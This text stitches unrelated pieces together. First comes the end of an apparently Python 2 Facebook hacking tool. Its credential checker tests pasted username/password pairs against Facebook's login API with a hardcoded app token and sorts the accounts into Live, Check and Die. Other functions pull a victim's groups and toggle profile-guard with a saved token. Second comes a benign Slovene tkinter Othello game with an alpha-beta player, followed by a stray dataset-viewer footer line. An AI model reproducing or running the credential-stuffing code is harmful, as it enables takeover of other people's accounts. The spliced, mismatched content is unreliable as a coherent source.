pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
othello.py | from tkinter import *
import threading
from alphabeta import Alphabeta
# Score bounds used as "infinity" by the alpha-beta search.
POS_INFINITY = 100000000000
NEG_INFINITY = -POS_INFINITY
# Player colours (Slovene: "Beli" = White, "Črni" = Black).
BELI = "Beli"
CRNI = "Črni"
# Player kinds (Slovene: "človek" = human, "računalnik" = computer).
CLOVEK = "človek"
RACUNALNIK = "računalnik"
# Rules/instructions text (in Slovene) shown in the "Navodila" window.
# The list elements are concatenated into one string before display.
# NOTE(review): on the 'mora prepustiti potezo...' line two adjacent literals
# are implicitly concatenated -- looks like a missing comma, but it is
# harmless because the whole list is joined anyway.
navodila = ["Othello ali reversi je strateška igra na igralni deski z 8 × 8 polji za dva igralca. ",
            "Igralca potrebujeta za igro črne in bele figure.\n\n", "Pravila igre:\n\n",
            "Na začetku ima vsak izmed igralcev na plošči dva žetona. ", "Igralca nato izmenično polagata žetone na ploščo. ",
            "Pri vsaki potezi mora biti žeton postavljen poleg nasprotnikovega žetona (lahko vodoravno, navpično ali diagonalno). ",
            "Položeni žeton mora v vsaki potezi ujeti enega ali več nasprotnikovih žetonov med dva svoja žetona. ",
            "Nasprotnikove žetone lahko ujame v katerikoli smeri od pravkar položenega (t.j. vodoravno, navpično ali diagonalno). ",
            "Ujetim nasprotnikovim žetonom igralec tako spremeni barvo. ",
            "Če igralec, ki pride na potezo, ne more storiti ničesar (t.j. ne more ujeti nasprotnikovih žetonov med dva svoja), ",
            "mora prepustiti potezo nasprotniku. " "Igralca nadaljujeta s postopkom igranja, dokler ne zapolnita vseh polj, ",
            "ali dokler se ne zgodi, da nobeden izmed njiju ne more narediti veljavne poteze. ",
            "Igralec, ki ima ob koncu igre na plošči največ žetonov svoje barve, zmaga.\n\n",
            "Za pomoč so v aplikaciji polja, kamor je možno postaviti žeton, označena z zeleno piko.\n\n",
            "Namig:\n\n", "Žetona, ki je postavljen v kot igralne deske, nasprotni igralec ne more ujeti oz. mu spremeniti barvo.",
            "Zato je priporočljivo zasesti čimveč kotov.", " Dobre so tudi pozicije ob robovih."]
# Square weights used by the evaluation heuristic: corners are most valuable,
# squares adjacent to corners are dangerous (negative).
# The table is symmetric under horizontal and vertical reflection; the
# original had a typo (-5 instead of -3) in the last row, breaking symmetry.
HEVRISTIKA = [[20, -3, 11, 8, 8, 11, -3, 20],
              [-3, -7, -4, 1, 1, -4, -7, -3],
              [11, -4, 2, 2, 2, 2, -4, 11],
              [8, 1, 2, 1, 1, 2, 1, 8],
              [8, 1, 2, 1, 1, 2, 1, 8],
              [11, -4, 2, 2, 2, 2, -4, 11],
              [-3, -7, -4, 1, 1, -4, -7, -3],
              [20, -3, 11, 8, 8, 11, -3, 20]]
def drugi(igr):
    """Return the opposing colour: BELI for CRNI and CRNI otherwise."""
    return BELI if igr == CRNI else CRNI
def veljavna(barva, di, dj, polje, i, j):
    """Return True iff a disc of colour `barva` placed on (i, j) captures
    in direction (di, dj).

    (di, dj) is the per-step change of the coordinates, e.g. di == 1 and
    dj == 1 walks the diagonal towards the lower-right edge of the board.
    The direction captures when it holds a non-empty run of opposing discs
    terminated, still on the board, by a disc of our own colour.
    """
    nasprotnik = drugi(barva)
    korak = 1
    # skip over the run of opposing discs in direction (di, dj)
    while (0 <= i + korak * di <= 7) and (0 <= j + korak * dj <= 7) \
            and polje[i + korak * di][j + korak * dj] == nasprotnik:
        korak += 1
    konec_i = i + korak * di
    konec_j = j + korak * dj
    if not (0 <= konec_i <= 7 and 0 <= konec_j <= 7):
        # ran off the board before closing the run
        return False
    # valid only if at least one opposing disc was skipped (korak > 1)
    # and the run ends on our own colour
    return korak > 1 and polje[konec_i][konec_j] == barva
def seznam_sosedov(i, j):
    """Return the list of neighbours [i1, j1] of square (i, j) on an 8x8 board.

    Replaces the original hand-enumerated corner/edge/middle case split with
    a single comprehension; the same squares are returned (callers iterate
    the neighbours order-independently).
    """
    return [[i + di, j + dj]
            for di in (-1, 0, 1)
            for dj in (-1, 0, 1)
            if (di, dj) != (0, 0) and 0 <= i + di <= 7 and 0 <= j + dj <= 7]
class Igra():
    """Represents the current state of one Othello game (board, counters, history)."""
    def __init__(self):
        self.na_potezi = CRNI # whose turn it is
        # number of black/white discs currently on the board
        self.stejcrne = 2
        self.stejbele = 2
        # weighted value of the black/white discs, computed from HEVRISTIKA
        self.vrednost_crnih = 2
        self.vrednost_belih = 2
        self.crni = CLOVEK # who plays black (human or computer)
        self.beli = CLOVEK # who plays white
        # maps a colour to its player kind (i.e. whether black/white is computer or human)
        self.slovar = {CRNI:self.crni, BELI:self.beli}
        self.pass_poteze = 0 # counts situations where the player to move had no valid move
        # the board: 8x8 list of lists holding None (empty square), CRNI or BELI
        self.polje = [[None for i in range(8)] for j in range(8)]
        # place the four starting discs on self.polje
        self.polje[3][3] = CRNI
        self.polje[4][4] = CRNI
        self.polje[3][4] = BELI
        self.polje[4][3] = BELI
        self.prejsnja_stanja = [] # previous game states (for undo)
        # each entry has the form [na_potezi, stejcrne, stejbele, vrednost_crnih, vrednost_belih, polje, pass_poteze]
    def konec(self):
        '''Determine whether the game is over. Returns None (game still running),
        the string 'Neodločeno' (draw), or the winning colour.'''
        # over when neither side can move, both passed in a row, or the board is full
        if self.poteze(CRNI)== self.poteze(BELI)==["pass"] or self.pass_poteze >= 2 or self.stejbele+self.stejcrne == 64:
            if self.stejcrne > self.stejbele:
                return CRNI
            elif self.stejbele > self.stejcrne:
                return BELI
            else:
                return "Neodločeno"
        else:
            return None
    def vrednost(self):
        """Estimate of the current game value from the viewpoint of the player
        to move. Exact when the game is over, otherwise an approximation."""
        # at the end return the exact score: the difference in disc counts
        if self.konec()!= None:
            if self.na_potezi == CRNI:
                return (self.stejcrne - self.stejbele)
            else:
                return (self.stejbele - self.stejcrne)
        # A player tries to maximise his own mobility and minimise the
        # opponent's: more moves to choose from, and the opponent may be
        # forced into a bad move.
        poteze_crnega = len(self.poteze(CRNI))
        poteze_belega = len(self.poteze(BELI))
        # ["pass"] means no real move, so mobility is zero
        if self.poteze(CRNI) == ["pass"]:
            poteze_crnega = 0
        elif self.poteze(BELI) == ["pass"]:
            poteze_belega = 0
        # combine the weighted disc-value difference with the mobility difference
        if self.na_potezi == CRNI:
            return (self.vrednost_crnih - self.vrednost_belih) + (poteze_crnega - poteze_belega)
        else:
            return (self.vrednost_belih - self.vrednost_crnih) + (poteze_belega - poteze_crnega)
    def poteze(self, barva):
        """Return the list of valid moves (i, j) for `barva` in the current
        position, or ["pass"] when there is none."""
        sez_moznosti=[]
        for j in range(len(self.polje)):
            for i in range(len(self.polje[j])):
                if self.polje[i][j] == None:
                    # an empty square is a candidate if a capture exists in
                    # the direction of some neighbour
                    for (i1,j1) in seznam_sosedov(i, j):
                        di = i1-i
                        dj = j1-j
                        if veljavna(barva, di, dj, self.polje, i, j) and (i,j) not in sez_moznosti:
                            sez_moznosti.append((i,j))
        if sez_moznosti ==[]:
            sez_moznosti =["pass"]
        return sez_moznosti
    def povleci(self, poteza, canvas = None, zetoni = None):
        """Play `poteza` (assumed valid). Optionally updates the tkinter
        canvas/disc grid so flipped discs are recoloured on screen."""
        # before making the move, save the current state for undo
        polje = [self.polje[i][:] for i in range(8)] # COPY of the board
        self.prejsnja_stanja.append([self.na_potezi, self.stejcrne, self.stejbele, self.vrednost_crnih, self.vrednost_belih, polje, self.pass_poteze])
        # make the move
        if poteza == "pass":
            self.na_potezi = drugi(self.na_potezi) # the player has no move, skip him
            self.pass_poteze +=1
        else:
            (i,j) = poteza
            self.polje[i][j] = self.na_potezi
            self.pass_poteze = 0
            # update the black/white counters and weighted values
            if self.na_potezi == CRNI:
                self.stejcrne += 1
                self.vrednost_crnih += HEVRISTIKA[i][j]
            else:
                self.stejbele += 1
                self.vrednost_belih += HEVRISTIKA[i][j]
            # trapped discs change colour
            self.preobrni(i, j, canvas, zetoni)
        # now it is the other player's turn
        self.na_potezi = drugi(self.na_potezi)
        # if a human is to move but has no valid move, skip him
        self.preskok()
    def preobrni(self, i, j, canvas = None, zetoni = None):
        """Flip the opposing discs that the move on (i, j) trapped between
        two of the mover's own discs."""
        barva = self.na_potezi
        seznam = seznam_sosedov(i, j)
        for (i1, j1) in seznam:
            if self.polje[i1][j1] == drugi(barva):
                # found an adjacent opposing disc; determine in which
                # direction it lies (i.e. compute di and dj)
                di = i1-i
                dj = j1-j
                if veljavna(barva, di, dj, self.polje, i, j):
                    # the direction captures: recolour the opposing discs
                    # along (di, dj) and update the count/value counters
                    k = 1
                    while self.polje[i+k*di][j+k*dj] == drugi(barva):
                        self.polje[i+k*di][j+k*dj] = barva
                        if barva == BELI:
                            if canvas: canvas.itemconfig(zetoni[i+k*di][j+k*dj], fill="white")
                            self.stejcrne-=1
                            self.stejbele+=1
                            self.vrednost_belih += HEVRISTIKA[i+k*di][j+k*dj]
                            self.vrednost_crnih -= HEVRISTIKA[i+k*di][j+k*dj]
                        else:
                            if canvas: canvas.itemconfig(zetoni[i+k*di][j+k*dj], fill="black")
                            self.stejcrne+=1
                            self.stejbele-=1
                            self.vrednost_crnih += HEVRISTIKA[i+k*di][j+k*dj]
                            self.vrednost_belih -= HEVRISTIKA[i+k*di][j+k*dj]
                        k += 1
    def preklici(self, poteza):
        """Undo the last move by restoring the most recently saved state."""
        self.na_potezi, self.stejcrne, self.stejbele, self.vrednost_crnih, self.vrednost_belih, self.polje, self.pass_poteze = self.prejsnja_stanja.pop()
    def preskok(self):
        """If the player to move is human and has no valid move, skip him."""
        if self.slovar[self.na_potezi] == CLOVEK:
            if self.poteze(self.na_potezi) == ["pass"]:
                self.na_potezi = drugi(self.na_potezi)
class Othello:
    """Main application class (everything related to the GUI)."""
    def __init__(self, master):
        master.title('Othello')
        #-------------------------------------------------menu----------------------------------------------------------#
        menu = Menu(master)
        master.config(menu=menu)
        meni1 = Menu(menu)
        menu.add_cascade(label="Igra", menu=meni1)
        # game modes: human/computer for each colour, depth 2/3/4 = easy/medium/hard
        meni1.add_command(label="Črni=Človek, Beli=Človek", command=lambda: self.zacni_igro(CLOVEK, CLOVEK, None))
        meni1.add_command(label="Črni=Človek, Beli=Računalnik - lahka", command=lambda: self.zacni_igro(CLOVEK, RACUNALNIK, 2))
        meni1.add_command(label="Črni=Človek, Beli=Računalnik - srednja", command=lambda: self.zacni_igro(CLOVEK, RACUNALNIK, 3))
        meni1.add_command(label="Črni=Človek, Beli=Računalnik - težja", command=lambda: self.zacni_igro(CLOVEK, RACUNALNIK, 4))
        meni1.add_command(label="Črni=Računalnik, Beli=Človek - lahka", command=lambda: self.zacni_igro(RACUNALNIK, CLOVEK, 2))
        meni1.add_command(label="Črni=Računalnik, Beli=Človek - srednja", command=lambda: self.zacni_igro(RACUNALNIK, CLOVEK, 3))
        meni1.add_command(label="Črni=Računalnik, Beli=Človek - težja", command=lambda: self.zacni_igro(RACUNALNIK, CLOVEK, 4))
        meni1.add_command(label="Črni=Računalnik, Beli=Računalnik", command=lambda: self.zacni_igro(RACUNALNIK, RACUNALNIK, 3))
        meni2 = Menu(menu)
        menu.add_cascade(label="Navodila", menu=meni2)
        meni2.add_command(label="Pravila igre", command=self.narisi_toplevel)
        meni3 = Menu(menu)
        menu.add_cascade(label="Izhod", menu=meni3)
        meni3.add_command(label="Izhod iz igre", command=self.zapri)
        #-----------------------------------------------------------------------------------------------------------------#
        self.igra = None # no game is being played yet
        # label that says whose turn it is
        self.napis = StringVar(master, value="Začnimo.")
        Label(master, textvariable=self.napis,font=("Tahoma", 14)).grid(row=0, column=0,sticky=W)
        # labels with the current black/white disc counts
        self.napiscrni = StringVar(master, value="")
        self.napisbeli = StringVar(master, value="")
        Label(master, textvariable=self.napiscrni,font=("Tahoma", 14)).grid(row=3, column=0,sticky=W)
        Label(master, textvariable=self.napisbeli,font=("Tahoma", 14)).grid(row=3, column=1,sticky=E)
        self.canvas = Canvas(master, width=400, height=400, background="#97CAB1")
        self.canvas.grid(row=2, column=0, columnspan=2)
        self.canvas.bind('<Button-1>', self.klik)
        # 8x8 grid of tkinter oval ids for the discs
        self.zetoni = [[None for i in range(8)] for j in range(8)]
        # 8x8 grid of tkinter ids for the dots marking possible moves
        self.pike = [[None for i in range(8)] for j in range(8)]
        self.globina = None # search depth for the computer player
        self.mislec = None # background thread running the alpha-beta search
        self.mislec_poteza = None # move proposed by the thread, once found
        self.mislec_stop = False # flag asking the thread to stop
        self.zacni_igro(CLOVEK, CLOVEK, None)
    def narisi_toplevel(self):
        """Create the window that opens when 'Navodila' is chosen in the menu."""
        # NOTE(review): uses the module-level global `master`, not the master
        # passed to __init__ -- works only because this file creates one at
        # module scope; confirm before reusing the class elsewhere.
        toplevel = Toplevel(master, width=100, height=100, takefocus = True)
        toplevel.title("Pravila igre")
        toplevel.resizable(width=False, height=False) # prevent resizing of the window
        # join the strings from `navodila` into a single string
        navodilo = ""
        for element in navodila:
            navodilo+=element
        text = Text(toplevel) # the text inside the "toplevel" window
        scrollbar = Scrollbar(toplevel)
        scrollbar.config(command=text.yview)
        text.config(yscrollcommand=scrollbar.set)
        scrollbar.pack(side="right", fill="y", expand=False)
        text.pack(side="left", fill="both", expand=True)
        text.insert(INSERT,navodilo)
        text.config(wrap=WORD) # wrap on word boundaries, not mid-word
        text.config(state=DISABLED) # make the text read-only
    def zapri(self):
        """Close the game, stopping the thinker thread first."""
        if self.mislec != None:
            self.mislec_stop = True
            self.mislec.join()
        self.canvas.master.destroy()
    def zacni_igro(self, crni, beli, globina):
        # create a new game
        self.igra = Igra()
        self.globina = globina
        self.igra.crni = crni # who plays black
        self.igra.beli = beli # who plays white
        # maps a colour to its player kind (i.e. human or computer)
        self.igra.slovar = {CRNI:self.igra.crni, BELI:self.igra.beli}
        # if the computer is still thinking, tell it to stop and wait for it
        if self.mislec != None:
            self.mislec_stop = True
            self.mislec.join()
        # grid holding the discs (tkinter ovals)
        self.zetoni = [[None for i in range(8)] for j in range(8)]
        # grid holding the tkinter dots that mark possible moves
        self.pike = [[None for i in range(8)] for j in range(8)]
        # black moves first; set the labels accordingly
        if self.igra.crni == CLOVEK:
            self.napis.set("Na potezi je Črni.")
        else:
            self.napis.set("Črni razmišlja. Ne bodite nestrpni!")
        # set the labels with the number of black/white discs
        self.napiscrni.set("Črni: "+str(self.igra.stejcrne))
        self.napisbeli.set("Beli: "+str(self.igra.stejbele))
        # draw the grid lines on the canvas
        self.canvas.delete(ALL)
        for i in range(8):
            self.canvas.create_line(i*50,0,i*50,400, fill="black", width=2)
            self.canvas.create_line(0,i*50,400,i*50, fill="black", width=2)
        # draw the four starting discs
        self.canvas.create_oval(150+5, 150+5, 150+45, 150+45, fill="black")
        self.canvas.create_oval(200+5, 200+5, 200+45, 200+45, fill="black")
        self.canvas.create_oval(200+5, 150+5, 200+45, 150+45, fill="white")
        self.canvas.create_oval(150+5, 200+5, 150+45, 200+45, fill="white")
        # store the starting discs in self.zetoni
        self.zetoni[3][3]=self.canvas.create_oval(150+5, 150+5, 150+45, 150+45, fill="black")
        self.zetoni[4][4]=self.canvas.create_oval(200+5, 200+5, 200+45, 200+45, fill="black")
        self.zetoni[4][3]=self.canvas.create_oval(200+5, 150+5, 200+45, 150+45, fill="white")
        self.zetoni[3][4]=self.canvas.create_oval(150+5, 200+5, 150+45, 200+45, fill="white")
        self.pomoc() # draw the dots that mark the possible moves
        if self.igra.crni == RACUNALNIK:
            self.racunalnik_odigraj_potezo()
    def odigraj(self, poteza):
        """If the square is empty and the move is valid, play the move."""
        if poteza == "pass":
            # the player has no possible move; only the turn labels change
            self.konec_pomoci() # wipe the move-hint dots off the canvas
            self.igra.povleci(poteza, canvas=self.canvas, zetoni=self.zetoni)
            if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
                self.napis.set("Na potezi je " + self.igra.na_potezi)
            else:
                self.napis.set(self.igra.na_potezi + " razmišlja. Ne bodite nestrpni!")
            self.pomoc()
        else:
            # check whether the move is valid in at least one direction
            i,j=poteza[0],poteza[1]
            je_veljavna = False
            for (dx, dy) in [(-1,0), (1,0), (0,-1), (0,1), (1,1), (1,-1), (-1,1), (-1,-1)]:
                je_veljavna = veljavna(self.igra.na_potezi, dx, dy, self.igra.polje, i, j)
                if je_veljavna: break
            # if the move is valid, draw it and then refresh the labels
            if self.igra.polje[i][j] is None and je_veljavna:
                self.konec_pomoci() # wipe the move-hint dots off the canvas
                if self.igra.na_potezi == CRNI:
                    self.narisiCrnega(i,j)
                else:
                    self.narisiBelega(i,j)
                self.igra.povleci((i,j), canvas=self.canvas, zetoni=self.zetoni)
                if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
                    self.napis.set("Na potezi je " + self.igra.na_potezi)
                else:
                    self.napis.set(self.igra.na_potezi + " razmišlja. Ne bodite nestrpni!")
                self.napiscrni.set("Črni: "+str(self.igra.stejcrne))
                self.napisbeli.set("Beli: "+str(self.igra.stejbele))
                self.pomoc()
        # check whether the game is over
        r = self.igra.konec()
        if r == "Neodločeno":
            self.igra.na_potezi = None
            self.napis.set("Neodločeno")
        elif r is not None:
            self.napis.set('Zmagal je ' + r)
        else:
            # check whether the computer has to play a move
            if self.igra.slovar[self.igra.na_potezi] == RACUNALNIK:
                # schedule it with a delay instead of calling
                # self.racunalnik_odigraj_potezo directly, so the previous
                # move gets a chance to be drawn at all
                self.canvas.after(100, self.racunalnik_odigraj_potezo)
    def racunalnik_odigraj_potezo(self):
        '''Have the computer play its next move.'''
        # create the worker thread
        self.mislec_poteza = None
        self.mislec_stop = False
        self.mislec = threading.Thread(target=self.razmisljaj)
        # start the worker thread
        self.mislec.start()
        # in 0.1 s check whether self.mislec has finished
        self.canvas.after(100, self.mislec_preveri_konec)
    def razmisljaj(self):
        """Set the computer's move to the one suggested by 'alphabeta'."""
        self.mislec_poteza = Alphabeta(self.igra, True, globina = self.globina).igraj()
        self.mislec = None # drop the object representing the thread
    def mislec_preveri_konec(self):
        """Check whether 'alphabeta' has already found a move, and play it."""
        if self.mislec_poteza == None:
            # self.mislec has not finished; check again in 0.1 s
            self.canvas.after(100, self.mislec_preveri_konec)
        else:
            # self.mislec has finished; play the move
            poteza = self.mislec_poteza
            self.odigraj(poteza)
    def klik(self, event):
        """Play a move on mouse click (board squares are 50x50 pixels)."""
        # NOTE(review): after a draw self.igra.na_potezi is set to None, so
        # this lookup would raise KeyError on a further click -- confirm
        # whether that case can be reached in practice.
        if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
            i = int(event.x / 50)
            j = int(event.y / 50)
            self.odigraj((i, j))
    def narisiCrnega(self, i, j):
        """Draw a black disc on square (i, j)."""
        x = i * 50
        y = j * 50
        self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="black")
        self.zetoni[i][j] = self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="black")
    def narisiBelega(self, i, j):
        """Draw a white disc on square (i, j)."""
        x = i * 50
        y = j * 50
        self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="white")
        self.zetoni[i][j] = self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="white")
    def pomoc(self):
        """Draw the dots marking the moves available to the player to move."""
        if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
            for poteza in self.igra.poteze(self.igra.na_potezi):
                if poteza == "pass":
                    pass
                else:
                    i,j=poteza[0],poteza[1]
                    pika = self.canvas.create_oval(i*50+20, j*50+20, i*50+25, j*50+25, fill="green")
                    self.pike[i][j] = pika
    def konec_pomoci(self):
        """Delete the dots marking the possible moves of the player to move."""
        for podseznam in self.pike:
            for element in podseznam:
                if element != None :
                    self.canvas.delete(element)
        self.pike = [[None for i in range(8)] for j in range(8)]
# Script entry point: build the root window, start the application and the
# tkinter event loop. `master` stays a module-level global because
# Othello.narisi_toplevel references it directly.
master = Tk()
aplikacija = Othello(master)
master.resizable(width=FALSE, height=FALSE) # prevent the user from resizing the window
master.mainloop()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.